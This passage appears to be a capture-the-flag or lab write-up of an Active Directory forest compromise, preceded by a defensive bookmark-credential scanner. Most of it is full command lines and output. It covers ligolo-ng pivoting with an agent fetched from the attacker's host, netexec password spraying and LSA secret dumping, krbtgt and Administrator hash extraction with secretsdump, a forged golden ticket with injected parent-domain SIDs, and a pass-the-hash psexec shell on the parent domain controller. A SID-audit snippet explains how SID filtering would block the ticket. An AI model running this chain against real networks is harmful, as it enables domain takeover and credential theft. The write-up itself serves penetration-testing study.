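def credential_params(url: str) -> List[str]:
    """Names of query parameters that look like credentials. The query is cut at '?' only, not at '#',
    because the stored string keeps a raw '#' that a browser would treat as a fragment."""
    query = url.partition("?")[2]
    found = []
    for pair in query.split("&"):
        name = pair.partition("=")[0].strip().lower()
        if name in CREDENTIAL_PARAMS:
            found.append(name)
    return found


def has_userinfo(url: str) -> bool:
    """scheme://user:password@host form."""
    return urlsplit(url).password is not None


def scan_bookmarks(conn: sqlite3.Connection) -> List[Dict[str, object]]:
    findings = []
    rows = conn.execute("""SELECT b.id, b.title, p.url FROM moz_bookmarks b
                           LEFT JOIN moz_places p ON p.id = b.fk WHERE b.type = 1""")
    for bookmark_id, title, url in rows:
        # Both the place URL and the bookmark title are checked: the title is the URL
        # when a page with no <title> is bookmarked, as on the host.
        for field, value in (("url", url), ("title", title)):
            if not value:
                continue
            reasons = credential_params(value)
            if has_userinfo(value):
                reasons.append("userinfo")
            if reasons:
                findings.append({"id": bookmark_id, "field": field,
                                 "reason": ",".join(reasons), "value": value})
    return findings
```

On a real profile, open a copy of `places.sqlite` (Firefox holds a lock on the live file) and extend the scan to `moz_places.url` for history entries, since a login URL that was only visited, never bookmarked, leaks the same way.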
Set up pivoting - ligolo-ng
Check all interfaces
Found a second interface: ens34
2: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:96:e4:32 brd ff:ff:ff:ff:ff:ff
altname enp2s2
inet 192.168.98.15/24 brd 192.168.98.255 scope global noprefixroute ens34
valid_lft forever preferred_lft forever
---
root@ubuntu-virtual-machine:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:96:e4:32 brd ff:ff:ff:ff:ff:ff
altname enp2s2
inet 192.168.98.15/24 brd 192.168.98.255 scope global noprefixroute ens34
valid_lft forever preferred_lft forever
3: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:96:62:dd brd ff:ff:ff:ff:ff:ff
altname enp2s0
inet 192.168.80.10/24 brd 192.168.80.255 scope global noprefixroute ens32
valid_lft forever preferred_lft forever
root@ubuntu-virtual-machine:~#
Download ligolo-ng
https://github.com/nicocha30/ligolo-ng/releases/tag/v0.8.2
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ wget -nv https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
2025-06-06 12:33:23 URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/390351016/9baf3b13-1ffc-4b17-b940-3ff5b81b0ddc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250606T103322Z&X-Amz-Expires=300&X-Amz-Signature=be4498837f41137994d6cc2c26768f52c9fbf259f840474b2283ff17e69481af&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dligolo-ng_proxy_0.8.2_linux_amd64.tar.gz&response-content-type=application%2Foctet-stream [7658004/7658004] -> "ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz" [1]
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ wget -nv https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
2025-06-06 12:34:07 URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/390351016/53e88d45-e6bc-4b56-a3d6-20f11d27449c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250606T103406Z&X-Amz-Expires=300&X-Amz-Signature=72d5fa46b93e6a3741a6ed480de573a0feabed9fa6e91ce4c5845aeb345c8a29&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dligolo-ng_agent_0.8.2_linux_amd64.tar.gz&response-content-type=application%2Foctet-stream [2760155/2760155] -> "ligolo-ng_agent_0.8.2_linux_amd64.tar.gz" [1]
Untar archive
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ mkdir ligolo-ng_proxy ; tar -xvzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz -C ligolo-ng_proxy
LICENSE
README.md
proxy
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ mkdir ligolo-ng_agent ; tar -xvzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz -C ligolo-ng_agent
LICENSE
README.md
agent
Upload agent to remote host
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_agent]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.80.10 - - [05/Jun/2025 16:03:43] "GET /agent HTTP/1.1" 200 -
---
root@ubuntu-virtual-machine:~# cd /tmp/
root@ubuntu-virtual-machine:/tmp# wget http://10.10.200.239/agent
--2025-06-05 19:20:30-- http://10.10.200.239/agent
Connecting to 10.10.200.239:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6226072 (5.9M) [application/octet-stream]
Saving to: ‘agent’
agent 100%[==============================================>] 5.94M 5.06MB/s in 1.2s
2025-06-05 19:20:31 (5.06 MB/s) - ‘agent’ saved [6226072/6226072]
root@ubuntu-virtual-machine:/tmp# file agent
agent: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, Go BuildID=v3r31Mmmxzk1HhoNLgM9/VhZwLt9H6oKy81WBcYQD/EFksgavwJDRDY0r_iovA/z41SS8P0bVR-Mc05G5l_, stripped
root@ubuntu-virtual-machine:/tmp#
Configure pivoting
# Attacker
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip tuntap add user $(whoami) mode tun ligolo
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip route del 192.168.98.0/24 dev tun0
RTNETLINK answers: No such process
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip link set ligolo up
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip route add 192.168.98.0/24 dev ligolo
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ ip route
default via 192.168.126.2 dev eth0 proto dhcp src 192.168.126.128 metric 100
10.10.200.0/24 dev tun0 proto kernel scope link src 10.10.200.239
192.168.80.0/24 via 10.10.200.1 dev tun0
192.168.98.0/24 dev ligolo scope link linkdown
192.168.126.0/24 dev eth0 proto kernel scope link src 192.168.126.128 metric 100
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ ./proxy -selfcert -laddr 0.0.0.0:443
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:443
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0023] Agent joined. id=00505696e432 name=root@ubuntu-virtual-machine remote="192.168.80.10:45624"
ligolo-ng » session
? Specify a session : 1 - root@ubuntu-virtual-machine - 192.168.80.10:45624 - 00505696e432
[Agent : root@ubuntu-virtual-machine] » start
INFO[0078] Starting tunnel to root@ubuntu-virtual-machine (00505696e432)
[Agent : root@ubuntu-virtual-machine] » tunnel_list
┌───────────────────────────────────────────────────────────────────────────────────────────┐
│ Active sessions and tunnels │
├───┬──────────────────────────────────────────────────────────────────┬───────────┬────────┤
│ # │ AGENT │ INTERFACE │ STATUS │
├───┼──────────────────────────────────────────────────────────────────┼───────────┼────────┤
│ 1 │ root@ubuntu-virtual-machine - 192.168.80.10:45624 - 00505696e432 │ ligolo │ Online │
└───┴──────────────────────────────────────────────────────────────────┴───────────┴────────┘
[Agent : root@ubuntu-virtual-machine] »
---
# Victim
root@ubuntu-virtual-machine:/tmp# ./agent -connect 10.10.200.239:443 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.200.239:443"
Ping sweep for live hosts - 192.168.98.0/24
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ for i in {1..254} ;do (ping 192.168.98.$i -c 1 -w 1 >/dev/null && echo "192.168.98.$i" &) ;done
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
Creds spraying - netexec, user: john
1) Create a wordlist with the IPs
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ cat 192.168.98.0_ips.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
---
U: john
P: User1@#$%6
Confirm that the login/password works on MGMT
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u john -p 'User1@#$%6'
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\john:User1@#$%6
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\john:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\john:User1@#$%6 (Pwn3d!)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Dump LSA secrets - netexec
Found a second account, corpmngr, with a plaintext password
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u john -p 'User1@#$%6' --lsa
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\john:User1@#$%6 (Pwn3d!)
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\john:User1@#$%6
SMB 192.168.98.2 445 DC01 [-] warfare.corp\john:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] Dumping LSA secrets
SMB 192.168.98.30 445 MGMT CHILD.WARFARE.CORP/john:$DCC2$10240#john#9855312d42ee254a7334845613120e61: (2025-01-17 14:47:56)
SMB 192.168.98.30 445 MGMT CHILD.WARFARE.CORP/corpmngr:$DCC2$10240#corpmngr#7fd50bbab99e8ea7ae9c1899f6dea7c6: (2025-01-21 11:35:46)
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aes256-cts-hmac-sha1-96:344c70047ade222c4ab35694d4e3e36de556692f02ec32fa54d3160f36246eec
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aes128-cts-hmac-sha1-96:aa5b3d84614911fe611eafbda613baaf
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:des-cbc-md5:6402e0c20b89d386
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:plain_password_hex:4f005d003b006f0074005d003500760067002f0032007a0046004e0020004d00700023003600570031005000770041002600700055003d005a0047006100370033003e003b0032004600410059002a006b0046004400410069003e00530066006a0033006e0061007a004e0060003300590063005e0048006c005c0053003e003e0033003c007300500043007a002500300031004b00610060002000540033007a003f004200580048002f0068006d0052006f0027005b00520061003b003a0075002b0050004a005d006b003c006d004c00730045005d005b0074006c004b00760045005c00280059003a0066002000
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aad3b435b51404eeaad3b435b51404ee:0f5fe480dd7eaf1d59a401a4f268b563:::
SMB 192.168.98.30 445 MGMT dpapi_machinekey:0x34e3cc87e11d51028ffb38c60b0afe35d197627d
dpapi_userkey:0xb890e07ba0d31e31c758d305c2a29e1b4ea813a5
SMB 192.168.98.30 445 MGMT NL$KM:df885acfa168074cc84de093af76093e726cd092e9ef9c72d6fe59c6cbb70382d896c9569b67dcdac871dd77b96916c8c1187d40c118474c481ddf62a7c04682
SMB 192.168.98.30 445 MGMT [email protected]:User4&*&*
SMB 192.168.98.30 445 MGMT [+] Dumped 10 LSA secrets to /home/kali/.nxc/logs/MGMT_192.168.98.30_2025-06-09_154016.secrets and /home/kali/.nxc/logs/MGMT_192.168.98.30_2025-06-09_154016.cached
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$
Creds spraying - netexec, user: corpmngr
Found working creds for user corpmngr on CDC (192.168.98.120)
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u corpmngr -p 'User1@#$%6'
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [-] child.warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [-] child.warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u corpmngr -p 'User4&*&*'
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\corpmngr:User4&*&* STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\corpmngr:User4&*&*
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\corpmngr:User4&*&* (Pwn3d!)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Add hostnames to /etc/hosts¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ cat /etc/hosts | grep 192.168.98
192.168.98.2 warfare.corp dc01.warfare.corp
192.168.98.120 child.warfare.corp cdc.child.warfare.corp
192.168.98.30 mgmt.warfare.corp mgmt.child.warfare.corp
Extract hash krbtgt - impacket/secretsdump.py¶
hash krbtgt:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ ldapsearch -H ldap://cdc.child.warfare.corp -D '[email protected]' -w 'User4&*&*' -b 'DC=child,DC=warfare,DC=corp' "(sAMAccountName=krbtgt)"
# extended LDIF
#
# LDAPv3
# base <DC=child,DC=warfare,DC=corp> with scope subtree
# filter: (sAMAccountName=krbtgt)
# requesting: ALL
#
# krbtgt, Users, child.warfare.corp
dn: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
instanceType: 4
whenCreated: 20250117143052.0Z
whenChanged: 20250117144602.0Z
uSNCreated: 12300
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=child,DC=warfare,DC=corp
uSNChanged: 12932
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: RVoKHGFL3Uut/JKYLzVgHQ==
userAccountControl: 514
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 133815978520688766
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAkKHO39ID/ARpLEtw9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=warfare,DC=corp
isCriticalSystemObject: TRUE
dSCorePropagationData: 20250117144602.0Z
dSCorePropagationData: 20250117143052.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0
# search reference
ref: ldap://DomainDnsZones.child.warfare.corp/DC=DomainDnsZones,DC=child,DC=warfare,DC=corp
# search result
search: 2
result: 0 Success
# numResponses: 3
# numEntries: 1
# numReferences: 1
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp -just-dc-user 'child\krbtgt'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for child\krbtgt
[+] Calling DRSGetNCChanges for {1c0a5a45-4b61-4bdd-adfc-92982f35601d}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
krbtgt:aes128-cts-hmac-sha1-96:806d6ea798a9626d3ad00516dd6968b5
krbtgt:des-cbc-md5:ba0b49b6b6455885
[*] Cleaning up...
Golden ticket¶
Get SIDs¶
Parent SID : S-1-5-21-3375883379-808943238-3239386119
Child SID : S-1-5-21-3754860944-83624914-1883974761
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3754860944-83624914-1883974761
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3375883379-808943238-3239386119
Golden ticket - ticketer.py¶
krbtgt AES256 key: ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
Parent SID : S-1-5-21-3375883379-808943238-3239386119
Child SID : S-1-5-21-3754860944-83624914-1883974761
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/ticketer.py -domain child.warfare.corp -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.warfare.corp/corpmngr
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in corpmngr.ccache
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ KRB5CCNAME=corpmngr.ccache
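The ticketer.py call above forges a PAC for the child domain that carries group RID 516 (Domain Controllers) locally plus two extra SIDs: the parent domain's 516 and S-1-5-9 (Enterprise Domain Controllers). Inside a forest the parent-child trust honours foreign SIDs in the PAC by default; on a quarantined forest or external trust, SID filtering would strip them. As an added example, not part of this writeup, the following audits the SID set such a ticket would carry and separates privileged SIDs of the issuing domain from privileged SIDs that belong to another domain, which is the distinction SID filtering makes. The SIDs and RIDs are copied from the command above; the helper names are this example's own.

```python
# Values copied from the ticketer.py invocation on this page.
CHILD_SID = "S-1-5-21-3754860944-83624914-1883974761"
PARENT_SID = "S-1-5-21-3375883379-808943238-3239386119"
TICKET_GROUP_RIDS = [516]
TICKET_EXTRA_SIDS = [PARENT_SID + "-516", "S-1-5-9"]

# Well-known RIDs that grant domain-wide or forest-wide control.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
# Non-domain SIDs that are just as sensitive when injected into a PAC.
PRIVILEGED_WELL_KNOWN = {"S-1-5-9": "Enterprise Domain Controllers"}


def split_domain_sid(sid: str):
    """Split a domain-relative SID (S-1-5-21-...-RID) into (domain, rid).

    Returns (None, None) for SIDs that are not domain-relative, e.g. S-1-5-9.
    """
    if not sid.startswith("S-1-5-21-"):
        return None, None
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def audit_pac_sids(issuing_domain_sid, group_rids, extra_sids):
    """Return (sid, scope, role) for every privileged SID the PAC would carry.

    scope is 'local' for the issuing domain, 'foreign' for any other domain
    and 'well-known' for non-domain SIDs.
    """
    findings = []
    for group_rid in group_rids:
        if group_rid in PRIVILEGED_RIDS:
            sid = f"{issuing_domain_sid}-{group_rid}"
            findings.append((sid, "local", PRIVILEGED_RIDS[group_rid]))
    for sid in extra_sids:
        if sid in PRIVILEGED_WELL_KNOWN:
            findings.append((sid, "well-known", PRIVILEGED_WELL_KNOWN[sid]))
            continue
        domain, rid = split_domain_sid(sid)
        if domain is None or rid not in PRIVILEGED_RIDS:
            continue
        scope = "local" if domain == issuing_domain_sid else "foreign"
        findings.append((sid, scope, PRIVILEGED_RIDS[rid]))
    return findings


def foreign_privileged_sids(issuing_domain_sid, group_rids, extra_sids):
    """The SIDs a quarantined trust would remove: privileged SIDs of another domain."""
    return [
        sid
        for sid, scope, _ in audit_pac_sids(issuing_domain_sid, group_rids, extra_sids)
        if scope == "foreign"
    ]


if __name__ == "__main__":
    for sid, scope, role in audit_pac_sids(CHILD_SID, TICKET_GROUP_RIDS, TICKET_EXTRA_SIDS):
        print(f"{scope:10} {role:28} {sid}")
    print("would be stripped by SID filtering:",
          foreign_privileged_sids(CHILD_SID, TICKET_GROUP_RIDS, TICKET_EXTRA_SIDS))
```

The one foreign finding, the parent domain's RID 516, is the SID that makes the child-domain ticket usable against dc01.warfare.corp in the next step; a parent domain that quarantines its child trust would not accept it.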
Request Service Ticket¶
Sync time with dc01.warfare.corp¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -q dc01.warfare.corp
Tue Jun 10 12:57:43 PM CEST 2025
2025-06-10 12:44:07.800587 (+0200) -816.459912 +/- 0.168078 dc01.warfare.corp 192.168.98.2 s1 no-leap
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -u dc01.warfare.corp
Tue Jun 10 12:57:47 PM CEST 2025
2025-06-10 12:44:11.601715 (+0200) -816.431309 +/- 0.196975 dc01.warfare.corp 192.168.98.2 s1 no-leap
CLOCK: time stepped by -816.431309
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -q dc01.warfare.corp
Tue Jun 10 12:44:30 PM CEST 2025
2025-06-10 12:44:30.684135 (+0200) -0.029413 +/- 0.169560 dc01.warfare.corp 192.168.98.2 s1 no-leap
Request Service Ticket - getST.py¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass child.warfare.corp/corpmngr -debug
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: corpmngr.ccache
[+] Returning cached credential for KRBTGT/[email protected]
[+] Using TGT from cache
[+] Username retrieved from CCache: corpmngr
[*] Getting ST for user
[+] Trying to connect to KDC at CHILD.WARFARE.CORP:88
[+] Trying to connect to KDC at WARFARE.CORP:88
[*] Saving ticket in corpmngr@[email protected]
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ export KRB5CCNAME=corpmngr@[email protected]
Extract hash for user Administrator - secretsdump.py¶
hash Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60:::
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -u dc01.warfare.corp
Tue Jun 10 01:04:06 PM CEST 2025
2025-06-10 12:50:29.993375 (+0200) -816.460204 +/- 0.178708 dc01.warfare.corp 192.168.98.2 s1 no-leap
CLOCK: time stepped by -816.460204
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user 'warfare\Administrator' -debug
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: corpmngr@[email protected]
[+] Domain retrieved from CCache: CHILD.WARFARE.CORP
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from CIFS/[email protected] to CIFS/[email protected] and hoping for the best
[+] Username retrieved from CCache: corpmngr
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for warfare\Administrator
[+] Calling DRSGetNCChanges for {17446816-c072-445e-ac9b-c0e28630bed6}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=warfare,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ca1d92ce23046a58b1cec292376a7d3ec6de02176bf44fb50fede1db46fec183
Administrator:aes128-cts-hmac-sha1-96:33d3f5778fade9945053a05ce2f18445
Administrator:des-cbc-md5:3ba88a586240f423
[*] Cleaning up...
Login as user: Administrator - dc01¶
Login - psexec.py¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/psexec.py -debug 'warfare/[email protected]' -hashes aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.warfare.corp[\pipe\svcctl]
[*] Requesting shares on dc01.warfare.corp.....
[*] Found writable share ADMIN$
[*] Uploading file KitMylyT.exe
[*] Opening SVCManager on dc01.warfare.corp.....
[*] Creating service HaQq on dc01.warfare.corp.....
[*] Starting service HaQq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
